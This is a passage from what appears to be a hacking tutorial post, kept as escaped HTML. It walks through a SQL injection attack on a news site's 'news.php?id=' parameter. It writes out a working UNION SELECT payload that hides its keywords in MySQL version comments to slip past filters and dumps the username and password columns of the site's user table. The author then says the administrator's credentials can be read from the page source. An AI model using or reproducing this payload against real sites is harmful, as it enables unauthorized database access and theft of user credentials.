  &lt;p id=&quot;iczq&quot;&gt;Great, we have tables and columns for each table. Of all the tables, I focus on the following.&lt;/p&gt;
  &lt;figure id=&quot;ZJc4&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/c2cb17a28e752fe4d268b.png&quot; width=&quot;329&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;v8VM&quot;&gt;Here&amp;#x27;s what caught my attention. I will focus on a table &lt;code&gt;user&lt;/code&gt;and data dump of 2 columns: &lt;code&gt;username&lt;/code&gt;and &lt;code&gt;password&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;v5eN&quot;&gt;The final payload will be as follows:&lt;/p&gt;
  &lt;p id=&quot;dqlg&quot;&gt;&lt;code&gt;http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+kbelb_db.user),3,4,5-- -&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;KzuY&quot;&gt;Now we look at the source code and see the username and password of the administrator or user.&lt;/p&gt;
  &lt;figure id=&quot;ju1J&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/a539cbf2c1793d41f7765.jpg&quot; width=&quot;1415&quot; /&gt;
  &lt;/figure&gt;

</content></entry></feed>